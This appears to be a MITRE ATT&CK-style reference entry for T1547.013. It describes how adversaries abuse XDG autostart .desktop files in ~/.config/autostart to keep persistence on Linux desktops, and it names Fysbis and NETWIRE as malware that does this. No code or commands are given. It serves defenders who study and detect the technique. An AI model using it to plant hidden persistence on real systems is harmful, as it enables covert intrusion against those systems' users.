T1547.013 XDG Autostart Entries
Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the
~/.config/autostart directories and have a .desktop file extension.
Within an XDG autostart entry file, the
Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The
Name key indicates an arbitrary name assigned by the creator and the
Exec key indicates the application and command line arguments to execute.
Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use Masquerading to make XDG autostart entries look as if they are associated with legitimate programs.
||T1547.001, T1547.002, T1547.003, T1547.004, T1547.005, T1547.006, T1547.007, T1547.008, T1547.009, T1547.010, T1547.012, T1547.013, T1547.014, T1547.015
||10 September 2019
||10 November 2020
||Fysbis has installed itself as an autostart entry under
~/.config/autostart/dbus-inotifier.desktop to establish persistence.
||NETWIRE can use XDG Autostart Entries to establish persistence.